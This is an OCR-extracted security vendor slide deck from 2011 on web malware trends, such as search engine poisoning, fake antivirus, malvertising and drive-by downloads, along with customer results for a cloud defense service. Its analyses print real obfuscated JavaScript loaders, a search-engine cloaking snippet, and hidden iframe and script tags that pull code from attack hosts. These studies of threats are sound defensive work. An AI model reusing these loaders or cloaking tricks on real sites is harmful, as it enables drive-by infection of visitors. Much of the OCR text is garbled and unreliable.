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* Web Evolution 

* Attack Techniques and Trends 

* Smarter Intelligence for Web Threats 

* Some Customer Results 

* Evolving Architecture: The Next Step 
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Web Evolution 



Static Pages 



Dynamic Pages 



Dynamic Pages 



Interactive Pages 



Publishing Model 



Community Model 



Single Host Pages 




Multi-Host Pages 




Nice to Have 



Must Have 
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Multi-Host Pages 



EUci 



SPORT 
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rl 



6 Domains 
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Malware Identification Strategy 



A. Popular Web Site Pointers 

B. Middle Relay Servers & Link Farms 

C. Malware Download Hosts 



A 

Google 



Business Week 



B 



BLogger 



Wori.jPress.com 





SG*5ur W i 




Preserve Productivity 
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Paths to Malware Infection 



Infected Site 




Link Farm 



Ea 



Blogs, Forums 
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Search Engine Poisoning 
Attack Example 



(Hannah Montana Ownz 
Dad's Computer) 
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Go ;gle 



printable hannah maontana party invitations 



Google Search 



I'm Feeling Lucky 



Li name* Toe It 



Advertising Programs - Business Solutions - About Google 



S2009 ■ Pt\>i*o/ 
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VjOOQIC |printable hannah maontana party invitations | [ Search ] 






Google SafeSearch is ON Search: the web O pages from the UK 



Web S Show options 

Did you mean: printable hannah montana party invitations 

°o° Free Printable Disney Character Birthday Party Invitations 

Kids Birthday party themed Invitations Free Printable Disney Character Birthday Party ... 
Hannah Montana Birthday Party Invitation. June 22, 2006 ... 
disney-stationaryxoiu>''greeting-cards/birthday-invitations.php - Cached - Similar 

Free Printable Disney's Channels Hannah Montana Birthday Party ... 

Free Printable Disney's Channels Hannah Montana Birthday Invitation Miley Cyrus. 
disney-stationary.com/.. Hannah Montana Birthday Party Invitation php - Cached - Similar 

Hannah Montana Invitations - Birthday Party, Custom, Personalized ... 

http://www.personalizedpartyinvites.com Get custom Hannah Montana birthday party 
invitations at www.personalizedpartyinvites.com There are several - Event ... 
sandiego.olx.com/hannah-montana-invitations-birthday-party-custom-personalized- 
printable-iid-8884501 - Cached - Similar 

Hannah Montana Birthday Party Invitations - Associated Content 

26 Mar 2008 ... At DisnGy-Stationary.com you can access a frse printable Hannah Montana 

birthday party invitation. The cover features Hannah Montana and the ... 

www associatedcontent co m/ /h a n n a h_m o nta n a_b irthda y_p a rty _i n vitati o ns ht in I - 

Cached - Similar 



Hanna Montana Happy Birthday Printable Invitations 

18 Aug 2009 ... Free Printable Hannah Montana Birthday Party Invitations: At Disne 

Stationary mm iron ran 



xdesignstudios. com/.. ./index.php?...hanna-montana... printable-invitations - Similar 

Hannah Montana Birthday Party Invitations: Free Printable Place ... 

Hannah Montana Invitations will set the theme of your celebration immediately when your 
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The page at http://safeonlinescarinerv4.com says: 



Warning!!! Your computer contains various types of vulnerabilities and threats. 

Your system requires immediate anti viruses scan! Personal Antivirus can perform fast and free virus 
and malicious software scan of your computer . 



OK 
^ 



Cancel 



D Blue Coat Systems, Inc. 201 1 . All Rights Reserved. 



BiueOCoat 



0D* c x . 



rf v**ii ^t**f>«^dtj2ri^«joc*at0rjd^^ 






"L-i.; ;!.■'. .".J.:.. FWta :ffOff-,«H 



■^jj Atkl ex rnrovr- pc^mi 






s 



;i«Cem I ddef 



tMirmy: L^ibMl Vtnbw 
City; TxTQcr 

Vow pnvate dati \% under attack 1 



Vvi^c-nf -Klin pr*flr*-n 



jf SNwd D0Cr»errt» 



P- 



UalElfcffl 



00O™tS 



■ -■: 



*) OV&*AMCrh*ffa 



ru lirfc; iirtf.1 
[fcMeetwJ lro r 



Fvur cwnpuCrr, Wniikrwn Wrti Imyrtj- hoi 
t and < E«dy la reiTH¥C IttefiL. 




riF«!L*d*ifR: 



W Cnull WOflTL.Wkl33Jfet frd=,J It P TO 



ftrtwtrtii m^wwft .wt juImw m to* raro*«: ffcniTO! 



[y] AJhws-*, Truism 

F" ^mtv Uinwrnf ii|pr.Trij|j«i 

E WrtflfMrojariDownlofliltr 



bBMrttotUui 

Z5cv,dl 



Hffiwwr J j Crad 



"ipwrn -ridtnvrr:, Vi4»h i ni yfj Ibt idenrwiui Jrim Lnrr\ i nqiin Uria^i 

Marnl Luiirtfiun and kiaJ Upctti tu 4* uulur. GaUicreu if mnduwi un In 
pa*»*«df, tf-mad a-i^ess** and -si ChaT dd-s, i4*ch if nv-irtant f<* !r*u. 



DwcrtpUonc 

rhri pfaefiwi rt CBTffh-Ml^ rtnr^rfioiA fee yw^rr-, Tn>ui iKftMtLi.inVr- ~ • - jw^ .wm. ™rfi: -ritfrti wk.hdV' 

AaVtce 

Vou need to remove this threat as soon as possible! 



') Full system deanup 










HoG^^-j_[ust fixed the j 




X^^ — c^^er! 




<ft had a viru^^Lit, but 1 




X^^cleaned it aK \d... 


/ ^ 

/ / ^ 






(l^hLwhere wa^ 1..?) 1 



BtueQGoaf 


















Behind the Scenes... 
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Hijacked Website 



xdesignstudios.com 



dirl 



if ("search engine") { 

echo "...indexable content..." 
} else { 

echo "<body>< script src="live. js"x/script>" 
} 



index. php 



id=fall+printable+coloring+pages 

id=free+printable+easter+drawings 

id=disney+printable+cartoon+characters 

id=free+printable+halloween+sheets 

id=girls+free+printable+organizer 

id=in+store+printable+catherines+coupons 



live.js 
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Crawler's View 



I can even get a Free Printable Cards for those that live here 

Singing Hanna Montana from Brandy Arivett on Vimeo.<p> 

Free Disney Cartoon Character Printable Stationary Birthday Cards ...<p> 

Update: I have added Printable Valentine's Day Cards and Birthday Invitations with the 

Free Goofy Greeting Cards Halloween Hannah Montana hsm Lilo and ...<p> 

Hannah Montana Birthday Party Invitations -Associated Content<p> 



I'll be sending everyone Free Birthday Ecards this year! ... Emma 



Disney World Donald Duck Dora Easter 




isney-Stationary.com you can access a free printable Hannah 



Cyrus ... Miley Cyrus Birthday Card; Destiny Hope (Miley) 



Bikini Birthday Cards: Entourage Birthday Ecards: 



Free Printable Hannah Montana Birthday Party 

Montana birthday party invitation. <p> 

Hannah Montana Printable Envelopes | Di 

Free Disney Channel&apos;s Hannah Mo 

Cyrus; More Disney Character ...<p> 

Send FREE Spiderman-lmages-Birthday 

Hannah Montana/Myley Cyrus Valentines< 

</div> 

<div> 

<a href="http://xdesignstudios.com/dir1/index^ printable coloring pages</a> | 

<a href="http://xdesignstudios.com/dir1 /index. php^ia^orsfS^pr^^ printable characters</a> | 

<a href="http://xdesignstudios.com/dir1 /index. php?id=free+printable+halloween+sheets">free printable halloween sheets</a> | 

<a href="http://xdesignstudios.com/dir1/index.php?id=girls+free+printable+organizer">girlsfree printable organizer</a> | 

<a href="http://xdesignstudios.com/dir1 /index. php?id=printable+catherines+coupons">printable Catherines coupons</a> | 

<a href="http://xdesignstudios.com/dir1 /index. php?id=webkinzs+printable+coupons">webkinzs printable coupons</a> | 

<a href="http://xdesignstudios.com/dir1/index.php?id=free+printable+christmas+gift+tags">free printable Christmas gifttags</a> | 
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User's Network View 







document.write(unes 

cape('%3C%53%43 

%52%49%50%54% 

20%20%20%20%6C 

%61%6E%67%75... 



index.php 


?id=hannah-montana-printable-birthday-invitations 






live.js 
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te(UI ('%3C%53%43%52%49%50%54%20%20%20%20%6C%61%6E%67%75 

%61 %67%65%3D%22%6A%61 %76%61 %73%63%72%69%70%74%22%3E%20%20%20%66%75%6E% 
63%74%69%6F%6E%20%20%20 o /o20 o /o65 o /o78 o /o65 o /o67 o /o6F o /o6F o /o6C o /o65 o /o28 o /o7A o /o7A o /o29 o /o20 o /o20%2 
0%20%7B%20%20%20%20 o /o20%20 o /o20 o /o20 o /o20 o /o76 o /o61 o /o72 o /o20 o /o20 o /o20 o /o20 o /o20%20 o /o20%20 o /o20 
%20%79%79%3D%75%6E o /o65 o /o73 o /o63 o /o61 o /o70 o /o65 o /o28 o /o20 o /o20 o /o7A o /o7A o /o2E o /o73 o /o75 o /o62 o /o73%74 
%72%28%20%20%20%30 o /o2C o /o20 o /o20 o /o20 o /o7A o /o7A o /o2E o /o6C o /o65 o /o6E o /o67 o /o74 o /o68 o /o2D o /o31 o /o29°/o20 
%20%29%3B%20%20%20%76%61 o /o72%20%20 o /o78 o /o78 o /o78 o /o3D%27 o /o27 o /o3B o /o20%20 o /o20 o /o20 o /o66 o /o 
6F%72%28%74%3D%30%3B%20%20%20%20%74%3C. . .%65%73%63%61 %70%65%28%78%78%78 
%29%29%3B%20%7D%20%20%20 o /o20 o /o3C o /o2F%53 o /o43 o /o52%49%50 o /o54%3E , ));exegOOle( ,o /o264DT 
DSJQU%2631mbohvbhf%264E%2633kbwbtdsjqu /o2633 /o264Fepdvnfou/xsjuf /o2639voftdbqf /o2639%263 
8%26364D%263664%263654%263663%26365%3A%263661 %263665%263631 %263631 %263631 %263 
631 %263631 %263631 %263631 %263631 %263631 %263665%26366%3A%263661 %263656%26364E%2 
63633%263685%263676%263689%263685%26363G%26367B%263672%263687%263672%263684%26 
3674%263683%26367%3A%263681 %263685%263633%263631 %263631 %263631 %263664%263663%2 
63654%26364E%263633%263679%263685%263685%263681%26364B%26363G%26363G%263674%2 
63683%263672%263674%26367C%263684%26367%3A%26367F%263684%26367%3A%263675%2636 
76%26363F%263674%26367G%26367E%26363G%263683%263676%263675%26363G%263678%2636 
76%26367F%26363F%26367B%263684%263633%26364F%263631 %263631 %263631 %263631 %26364 
D%26363G%263664%263654%263663%26365%3A%263661%263665%26364F%2638%263%3A%263 
%3A%264C%264D0TDSJQU%264F1 ') ; 
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<SCRIPT language="javascript"> 
function exegoole(zz) { 

var yy=unescape( zz.substr( 0, zz.length-1) ); 

var xxx="; 

for(t=0; t<yy.length; t++) 

xxx+= String.fromCharCode(yy.charCodeAt(t)-zz.substr(zz.length-1 ,1 )); 

document. write(unescape(xxx)); 

} 
</SCRIPT> 

exegoole('%264DTDSJQU%2631mbohvbhf%264E%2633kbwbtdsjqu%2633%264Fepdvnfou/xsju 
f%2639voftdbqf%2639%2638%26364D%263664%263654%263663%26365%3A%263661%26366 
5%263631 %263631 %263631 %263631 %263631 %263631 %263631 %263631 %263631 %263665% 
26366%3A%263661%263656%26364E%263633%263685%263676%263689%263685%26363G% 
26367B%263672%263687%263672%263684%263674%263683%26367%3A%263681%263685% 
263633%263631 %263631 %263631 %263664%263663%263654%26364E%263633%263679%263 
685%263685%263681%26364B%26363G%26363G%263674%263683%263672%263674%26367 
C%263684%26367%3A%26367F%263684%26367%3A%263675%263676%26363F%263674%26 
367G%26367E%26363G%263683%263676%263675%26363G%263678%263676%26367F%2636 
3F%26367B%263684%263633%26364F%263631 %263631 %263631 %263631 %26364D%26363G 
%263664%263654%263663%26365%3A%263661%263665%26364F%2638%263%3A%263%3A 
%264C%264D0TDSJQU%264F1 '); 
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<SCRIPT language="javascript"> 

document.write(unescape('%3C%53%43%52%49%50%54%20%20%20%20%20%20%20% 

20%20%54%59%50%45%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69 

%70%74%22%20%20%20%53%52%43%3D%22%68%74%74%70%3A%2F%2F%63%72% 

61%63%6B%73%69%6E%73%69%64%65%2E%63%6F%6D%2F%72%65%64%2F%67%6 

5%6E%2E%6A%73%22%3E%20%20%20%20%3C%2F%53%43%52%49%50%54%3E')); 

</SCRIPT> 
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<SCRIPTTYPE="text/javascript" SRC="http://cracksinside.com/red/gen.js"> 
</SCRIPT> 
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Red Zone Defense 



& 







document.write(unes 

cape('%3C%53%43 

%52%49%50%54% 

20%20%20%20%6C 

%61%6E%67%75... 



index.phf d=hannah-montana-printable-birthday-invitations 




live.js 




http://cra:ksi Bic^cpi lred/gen.js 
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State of Web Security 






2008-2009 

Malware Blasts 
High Growth/Volume 
Dynamic Domains 
Search Engine Poisoning 



2010-2011 + 

Vulnerabilities/Exploits 
Focused Attacks 
Hacking Trusted Sites 
Malvertising 



MACHINE-GUN STRATEGY 



RIFLE APPROACH 
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Top Categories Hosting Malware 




VQ 





1. 


Suspicious 




13% UP 


2. 


Online Storage 






3. 


Pornography 




4. 


Computers/Internet 




5. 


Search Enaines/Portals 




29% UP 


6. 


Open/Mixed Content 






7. 


Personals/Dating 




8. 


Web Hosting 


9. 


Software Downloads 


10 


Phishing 


11 


Entertainment 


12 


Business/Economy 


13. 


Placeholders 


14 


Audio/Video Clips 


15 


Online Games 


16. 


Web Advertisements 


17 


Shopping^ 




<J8 


Hacking^> 




C 


19 


Peer-to-Peer/P2P 




^20. 


Gambling^ 





Highlights: 



Hacking Trusted Sites 

Good Reputations & Ratings 
Less Use of Free Domains 

Gambling/Hacking Decrease 

Not in the Top 15 Categories 
Often Blocked by Policy 

Pornography Remains a Lure 

Rate over 110,000 New Sites/Day 
Requires Real-time Ratings 

Suspicious Rating Flags Danger 

Obfuscation of Active Scripts 
Modifier Category 
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Top Web Attacks i 



#1 



Th* p*gt iHrttpLi.'Bniinv-fltirt-pvliciJl.cQpEC nyn 



TlttLM iySEtm Arfleettd by furfrWftiri virus. arXftCb i, MtfJlH* f ii*l fit rwommtf^* y*u tfl 
irsoll proper ioftrt *i* to i^owa youi computn 



FakeAV 



• 1 5% of malware on the web* 

• 60% for domains with trending key words 

• 50% of malvertising malware delivery* 

• Animated flash AV scans & graphics 

^2 Fake Update 

• Video codec or software update 

• Social networking sharing of photos/videos 

• Searches for adult or pornographic material 




* Google 13 month Security Study -April 2010 
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Malvertising #3 

■ Outsourced multi-tier ad networks 

■ Displaces search engine poisoning 

■ Cyber crime patience to develop trust 



i-l. ' ; 


February 


MTH'M 






BE 


IE 


11 


Jul 


y Aug mt j September 


















x 














October 


November December 














Ll±U U_ 


I .ill l,J I 


I I I i I , 





(5516 ) 


( 6642 ) 


( 7679 ) 


(7779 




6810 J J 






' 6787 J) 


(6585 J) 


( 8878 I) 


(8895 ) 


(8909 ) 


(8917 ") 


(9016 ") ("^8972 


") (886S l)({ 


8926 )\ 


^9026 ) { 


8860 ) { 


8994 ) 


(i 3925 i) 






(9036 i) 






") (8929 J^ 


1975^Y 


^891 l) { 












(8939 J} 


(8968J (8880 


2914 1) 






1977 ) 


(1983 J} 


(1978 1) 


(19SC ij) 


(144 ^ (626 Y{ 
" ^T 2171JJ 


638 yj[630 


) (1982 


) (2893 


) C 1981 


) (647 J 





28 © Blue Coat Systems, Inc. 201 1 . All Rights Reserved. 



BlueOCoat 



29 



Web Attack Profile 
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Host Domain 
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Traffic Pattern 
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Friend or Foe? 




Software Downloads 

Social Networking 

IM Attachments 

Web Mail 

P2P File Sharing 

Web 2.0 Active Content 





Malicious Mobile Code 
Malware/Trojans 
Exploit Kits 
Mal-PDFs 
Masquerading Files 
Downloader Droppers 



I 



One web click opens the door. 
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Wonderin' where the lions are? 




_ -^ *^* " 


w/1 

ifb.il 







... They're waiting near the watering holes. 

The Bad Guys on the Web want to be where the crowds are: 

Search Engines Video Sharing 

Social Networks Web Ad Networks 
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Blue Coat WebPulse: 

Implementing Dynamic Link Analysis 



75+ Million Users 



+2.8B Requests 

Per Week 

400 Million per day 




Multiple Threat Engines 

Behavioral Analysis 

Sandboxing/Call-home 

Active Script Scrubbers 

Correlation Rules 

Machine Analysis 

Human Raters 



&&&&&&£&£%-' 

&&&&&&&&S&:- a 



ProxySG & ProxyClient 
Enterprise Users 



K9 Consumer Users 



♦A 




Immediately Protects Blue Coat Web Gateway 
and Remote Users 
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Customer Results 

Financial/Enterprise #1 

• 70M web reqs/hour 

• Per Day Results 

• 628-Phishing 

• 1,609 - Hacking 



Call-Home 
Traffic 




Layer-1 



Layer-2 
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7,861 - Spyware 
fe cts/Priv ac y Conce r 

20,547 -Potentially 

Unw anted Snftw arp 

49,890 -Spyware/ M; 
[ ges 

l^OjAZI^SusfmQus 

L723 ProxyAV Alerts 




/are 
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Financial Enterprise #2 

• 20B web reqs/mth 

• One M onth Anajy sis 

Layer-1 ^547,000+ Spyware/ 
ilware Sources 



Layer-2 T 9,000+ ProxyAV Alerts 




ver 95% of web 
reats blocked by 
cloud defense 
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Evolving SWG Architecture 



2006 


2007 


2008 


2009 


2010 


2011 


2012 


2013 


2014 


2015 


2016 


2018 




Gateway 

On-Premise 
Stand Alone 
Update Cycles 
Human Raters 



Protocol/Category 



WebPulse 



Security 
SaaS 



Hybrid 



Service 




DEPLOYMENT 



AWARENESS 



I NTELL I GENCE 



ASSESSMENT 



GRANULAR I TY 



■> Hybrid 

■> Collaborative 

-► On-Demand 

-► Real-Time 

-► Web Application 
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Defense Comparison 



35 



Production-to-Box 

• Specification 

• Engineering 

• Test / QA / Beta 

• Release Cycles 

• Customer Update 

• Regional/Global Use 

• Support Feedback 

• SRs / FRs 
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Cloud-Defense 

• Specification 

• Security Experts 

• Test with Cloud Data 

• Review Results 

• Fine-tune/Feedback 

• Global Use 
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Mobile Devices 



Disruptive technology... on a global scale 

• Adoption rate 3-4 times of PC 

• PC divided developed from 3 rd world countries 

• Mobile enables 3 rd world to catch up 

• Unites 6B people to large information flows 

• Local or national brands quickly go global 

• Economy will follow mobile trends 

• So will cybercrime... 
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BlueQCoat 

CONTROL IS YOURS™ 
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SEP Attack Example #2 
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Fake Codec & Fake AV 
"Twofer" on a Hacked Site 

BlueQCoat 



Take a hacked site, 




39 © Blue Coat Systems, Inc. 201 1 . All Rights Reserved. 



BlueOCoat 



...and host some pages there... 



^j§ f ^f ^ i£i r* , |^ , *^i«±*ww50lcair^vjME^ireiiinJTfcfriLjnlH*£Me-.Wni 


» ■'! * quyi ho* u A>»^a *t 


^FiUFFEflUblTTEPOAE & 


* 



You (2^ 



FLUFREftMLTTTER CAKE 

ihwimwnjknrtm i.v\rvn - St 




141, WO v 



Lmwpmp I r^fcmh . u x\r IUUUH UMf " 
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Hidden in the 
HTML are the top 
25 results from a 
Google image 
search on the 
page name as 
well as text from 
a Google search 
of that name. 



A quick Google 
search showed 
over 800 pages 
there (at the time 
we visited)... 

BlueOCoat 



...to launch a Fake Codec attack: 



f,lr VAt tfr* h.irwr fc*m*** p** tJ*B 



Youb 



#&^4ff^BW^fiM*lui*^w*|^WWH0*a,Hffii » Kl"l-flfe^-^Wi-ii.*^ K 



BLUE COAT IS AWESOME 







tmam Mftrr I^bly Tin topyvr 
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Clicking on the 
"video" initiates a 
download 



Even the Bad 
Guys think that 
Blue Coat is cool ;) 
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...or a Fake AV attack: 






j^i 




&B4 ■ 33?" ilM >ro-w.ww?.?*imiTOn*aj*gi-^MJ3r.Vri-»iftl^rj£^ 




$ ft]n3.E."ip* Inn*!.* 
IJ ttiu li r k*lk-Lri ill 
^ r*i L#HI T,-niitlii:i^n J 



J - 



ire i »>j< -i c^iir^if wh^r i^ gun* inlnnwan fro** uwr » 

_*• :-arpiAn Ihrni^hl InLjTnrf «Dr.nnlm nd i*nfl C*m Lu ill 




WAHWNi ■ 



9 Win l-IVp* L I1KJJ..1 
© Viln3I.M:*-,mkml « 
r-di Lrf t, unUd!*p«J 

9 *imiu*wwTfwm.to*. 



Ii Ort. -Start rintacUK- fcnta hi «w* HftfUi 



It's kinda scary that it looks 

like Google is hosting this 

page 
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SEP Attack Example #3 




Drive-by Dowload 

The Happiest Puppy Ever 
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SEP Drive-by Download 



Search for "dogs 
and puppies"... 







* Zazpm nr-a- "r^Jl la- Ht*,: ♦ 








ll 


Cuojb' 'ixp p-idmnw* 










Ln^dfc^ 1 * "*■ m ^ i 1 — 


6^1* 'W^ ^- ■*■ — F - r^f¥,iii;nffflfi 











DupNJ'iq.ifJicSi 
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If referrer string 
matches some 
criteria, a drive- 
by download of a 
malicious PDF is 
attempted 



D Blue Coat Systems, Inc. 201 1 . All Rights Reserved. 




BlueOCoat 



SEP Attack Example #4 




Fake Warez 

Be Careful What You 
Search For... 
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Fake Warez 

■ People know they're looking for 
shady stuff, but do it anyway... 




They think 
they're 
careful and 
smart 
enough to 
avoid the 
Bad Guys. 



I t^L' 3^- Ifr-"* 1-iaLuif 



uih - bfj-uiud W - Hn-.rJlH I irp4DE =^i- 
uL ±rA* U-"V 



_ n jc 



i Uf^rTHL-d'JJ LWTI lb Shim ►«■-... I ^ 



mSmjtlj 



ini-nnn 



KeysnocBZ 



Dnrpy ikti i .frof .n 



"* non^/iapHoe 



uHtt-.lin_ no-ltf- 
fr*rx Mp #itH ift<ac: 
KfcwU yvj He IflWK Ur. lidT 



X C ™" J* 



1-LvufVi |Fkpni jr | fTwv- wprd | f'rt |n.-a ji.-m cm. 
ktapu: 

• ■" ■■■ m ■ i atBHa 'j l rata * liafcj : : I ^ir.rrti * 



H-k. j., Jl WWul mi ■■ I Aj.1.. IM — «-|- I I..-. r»d . A.D | ipP b^un r-KID | I ^Wi lliww* I 1. 

Anew fryufl .rfrTT'j-Kifl I fra^T-a -i fljwa &ht-j i rtwiL | ju tu ..i' ■ ■;: " :. : =-""=;:; =-;--, ■:.;"-;:■ 
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File is way too 
small to be the 
actual game. 
VirusTotal had 
five hits: 
enough to 
confirm that it's 
malicious, but 
also to show 
that it wasn't 
widely 
recognized yet. 
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Attack Vector: 

Social Networking Spam 
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Old Rules For Spam Safety 

■ Be careful in e-mail: 

• Delete all "funny-looking" e-mails without opening 

• Don't open attachments from people you don't know in 
realistic-looking e-mails 
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New Rules For Spam Safety 

■ Not just e-mail! 

• FB Wall posts, Tweets, etc. are "e-mails" 

■ Messages from "people you know" might NOT be from 
people you know... 

• Be very careful about clicking on links 

■ (note about e-mail outsourcers "training" people to click) 
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Spam Attack Example 







Changing Tactics & 
Payloads 
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Spammed Malware Attack, pt. 1 



¥ SeaMonkey 



File Edit View Go gaakmarks Taals Window Help 



http/ji 



s/image^rc arris. php'idSd 



I® O 



H Home jBaokmark's .. man Ha .org ■. moziFlaZine v mozdev erg 



Hi its me Angela 



Please download and install the latest version Adobe Flash Player for view oiir site. 



I MISS vou 



Best Wishas 



Cantantf (graphic*., t»it H muck) us ad an 1~ ^ i --'i • ~,Q ai« iapj-il-ghtad bo uc. "feu div w*lcem* fcc 
uiau and *n]oy th**e materials, but pitas* refrain fram using them for any other purpose, 
Copyright & l9*£'201i. 123Gre*tingi CO 
All Fight* P*:yi V -yd. 



II •■: :-! D • 
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E-card spam 
leads to bogus 
"gotta upgrade" 
page on 
hacked site... 
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Spammed Malware Attack, pt. 1 



mi 



File Edit ^sy Gc Bookmark* Twla Wnrtuw Kelp 

3, j ^a 




Attack site has 
a very nice fake 
Adobe page... 

...WebPulse 
blocked the 
EXE (it failed its 
Background 
Check) 
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Spammed Malware Attack, pt. 2 






is e 



1.11*1 sffl ' ■- nxcMa 1 ^ % rm 
I miss £JU* beery irwch J 




I MLS5 YOU 



«■ l*« in "jAw"! l¥ ■*■*■ 
k^m VH"i l*»i™ *»' *»r **^ 



bnu CO -fi rwr'-j**** b* 



„■ 



•*^ 
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This is the same fake e-card 
(still on hacked sites), but with 
an animated GIF added for you 
to look at... 

...while your browser is busily 
decrypting some Javascript in 
the background... 
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Spammed Malware Attack, pt. 2 



First, you pull an iframe from another hacked site. 



_ 


document wnte(' iframe sir 
absolute, left: Opa, top dp* 


='tittp//4fl 
width= H 10 l 


l^^o uk 1 ' index nun\' 
height= b 1D p >_<r(ftafne> 


sly1e="visibility 


hidden; 


position: 




■ 


OK 


1 









..and that has you pull another 


Frame, 


from the attack 


server... 


> [JavaScript Application] ~ x 


r \ doc urn e nt wnte( '<i(tame sre - 'http.//whatmy 
tt position, absolute; left Gp>;; top: Op* ' width 

L 


lpadressrufl 
='1(r height? 


tymhrnywcmdtg.php' sly!? 
'IQ'^/iframe*'); 


=Visrt}iliiy: hidden; 


OK 





.which then tries to load a Java exploit as a drive-by download. 
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EiIq Eat ^law Bookmarks Iools Sa&ngs. baJp 

,* HS -■ O % iiRIPlA 

<icripti»function frpateCSJ | wlortar, rt'cl aration! 1 v ■ r 
UA-[idV i y *tl a i « Hit* Aq en t .LoLuwtiifdsej h J V* * 

I ■ IK- ! /male / . t eat (ua) }&£ ! [/opera /.test (uaf J fit (/win/ .teat (naj J ;var 

3tyle_node-doirunient , createElement ("style"} ;if ( ! is IE) style_node . in cierHTML- select or* " 
f ¥ td»cljrat ion+ n \ w j dacuinnnt .qntfclwriHnt s&yTagNam* ("lipad") [0] .app**ridt."h ild( styl*_nnd*k'! ;if ( i _t 
I E £ i diJL- u n^j i L . a L y Lt S tiee L a & 1 J'.- v u i:i<r ill . a L y It; S lic-e L a . 1 =■ 1 1 y L t: v I [ V * r 

last_Btyle_n>Qde-docu.[Tient . stylesheets L doc ujnent . stylesheets . length- 1 ] j if < typaof ( last_atyl 
e_node . addPuleJ --'object " J laBt_5tyLe_node , addRule ( select or, declarat ion) ; (■ ) ;vmx 
dakn]i-[kBa]U:fl7 r dp«iSJ£:functioii|HTir ¥E-"wK n ;vii bM-functinn (| |i*tuiii ' inl-: r f ; v *r 
bL-funatiAfi(][ittnro 'I ..' | ,-f unet ion sJ(|-! IjVit t: - n*w Data (2011, 3, 23, I, ID, 
49 f ;K-*K.";p— *"; v-*v" ; this . bHV- H bKV*;vai q - h. get Minutest J ;var a - "£ romCharC 11 + 
h.getMontht) + "de'jvar r-functi«n I (rttmn 'r');?" k-97615; vbe pK-n*w Srrayll;a - 
*,r«pl*C«(J, "D");blf-" , ;ii- n u*; crmatmCSS i " »c0", "bickgraund : 
url IddLai r ±va\ n ) ; uD- n uD' ;v*ir z-" 'j»ij: v-nulijvar zS-£*la* ; wG-J D072 ;v*r 
hE -document . stylesheet s r'u&ction n() I ] ;wEL-ftlt«; kA-f ill* ; for (vt: 
b»0;b*hF,len'gth,'b++t \ sfl»G229 3;f unction hAU | | ;nr 

w-hF[b] -C3sRul»a| |hF|.b] . rul*s ; thi s . c-249 J7;Tir vl-n«« Arr,i/( J ;*or (t«.^ 
t— a j t ^w . ItJiyLtij t + +- Mi liia , vV-f *1 •• jvas e-'^jvar vIM-naw Array (J iirn 

j— w,iteri?w, item[t ) :w[t ] ; this .d- !,N ;ttiis.qB.- H c]R* ; this .hU-"*s if I ! j . select orText .matchl.''tc(\a 
+ j f\ jcentinu* ;vn 

py-fjilB^^thLs.fa-^fd";^-: _ at yl ». background I [n*g»_rnjh[zh(/'url\i:"?d*t.«\: L ' , ] * r [ L ""■>]+] ~?M t\ 

[l]jV4i cV-n*» Dac^U fvaif 1-aaw Array {\ ftX-* m i | jtie 

zT- 1 ' ;tliiH . t3-f ala* j tF-f ilit; I vir 

0-162. &*M kS> SO* 9,72, 78,S»,91 , &* 74, ifl . 3, 6 3 . », 3<1 , »,6S*, 36, 91 r 49 . 5, 60,68* 9, 9-1 , "2, 93 , ->, 9 3 ■ 9, 9 

1, BB*3,30.9, 77 »3, Ba.3, B2..1, 73. S, ST 1 , 31 ,51 .n t 37, 73, 62,, 53, 3J..3, &«, fl6 . 3, 66 . 3, 8 3, 9, 94, 3B.3, 92. 

3,67, 80, 60.9, 70, !H.a f 69.i f B3.U,&3i.!i,7?.!J,71p S9,5 r 04, &f . 5,&6,3/79, 3^-5+ 76^*7, fl> aO.S, 3g. a„ ft 
4,^4 r ti ,*!?.■*, 3^.1. IS. 5.1] ,69.a,aT.S,S7.a, 18.3^1 .98,54.86,^3,3,53,7^,5,61,67.3, 80.3^.^,94 

.1. »D,1 ( 95,90,^,63^2, !)l,-4,*i. ID, '"U . ■:,"■•.*■, "4 , H , ^i9 # 4 J,a, T?, 88- 1 , i<, A] .J>*6i, 88.5, tt^ 76. S, | 
72, Bl, 33,. 72, ba«i, S-T.i, &i f 61, ?f f b7.b f SI, bQ f *?S, b4 , iS, fi6, bB . a f b6„ iifi, b0.i,67.a + 73-bj.iB.b, &-, 9 
3.10D.3, &2. 3,54, 38, ?S. 12, "D, 30.4,32. 1,57, &1, 11, 5, 63. 5, 8^,55, SB. 5.62, &5, feB a 5, 52, S.4 . 3, 9-7 . S, \ 
■J6. 5, 66, fli . 3, 63, T?, 34. 3. 3~, 66, 5, 38, 5T, 66, 92. 3, 67. 9, 62 ,3, 3 A. 3, 71, 5. ST^i. 3, IB, la, 5, -51, 53. 6 

9,70,81,-»,98,sS,8Q,3 r 6Q.i r v-.i. --.i. 7l»6«<» f »B, 82 . B^ 84. ^ 9fi, ■a 1 , i , 64 . 3 r ^^ - 1 r •».<> . 3,52.^73,4 

H.3 r B3,30_3,6t f bS.a,74,*a-3,61,4ft,3*, 93,ga._3,9a,T7,ei,64.a r 6i i a7 r b,39,i,7€ r 6B.3 f 64.3,96,3' 

4 i BJ,62.5,l33.a J Bl H ^U',Ba d Eilt,3l.5,7j.3,Bl.3,3B d ftJ J 3,H^.S,Ba,b9.3,J)'>.3 J 7|{.3 J a',94,&3 p S4.5,7Q! 

,87, 87, 64. 3, "'3.3,7 3,60.3,53.3, 52. 3, 73, 101, 56. 3, 94, 38, 1,71, 36, 78, 5, 83, 5, 84, 66. 3, 90. 9, 52,67 

.1.-1 .b,RKb,5] ,b, 71, s^Tl.s^S,^ s?,s, 6«,3,70.3, 8b, 64,9, SO, U, 77,61, ff. !j, Si, H3j »7, i." . - . 1 

.3*31, *9, B9.3,71, 93,92, 30, 91 . 3> 33, B7, 69 . 3, 6D, 6? , 9D . 3, B6, B&, 6* . 3, 34, fiO, 99 . 3, B6 . 3 + 3D, 31 . 3, 3 

9, 36.9,49.3,60.3, 36,60, 75 f B2, 9 J. 3, 3l.3,99.3,3J,'r2.3^'r3 | 7a.3p69,91 1 66,49 i 3J.9 1 44.3 1 39,33.3; 

, 88. 3, 68, 80. 3, 62, 81, T3, 7{J > 34, 3^ r 60, 34, 39, 49, 36, 5, 93, 95, 73 ,5, 94, 69, 70, 5, 69> 54, 38. 5, 49, 3, 3 3 

Ji)f p-32243; f ^-f *1*» }"ht -"hr * $ Vmx yO-'fTar gs-";v« 

uO- 1 ' ;Lhir. iU-62D46;ii-fianat±Dd | J | return 

l|?0iHfg.lengLLi/4| ^ j , ,pOiK*i; L li i :• . lA-f alaa ; vac bE- 11 t-E " s cD-' -M jfai {tie 

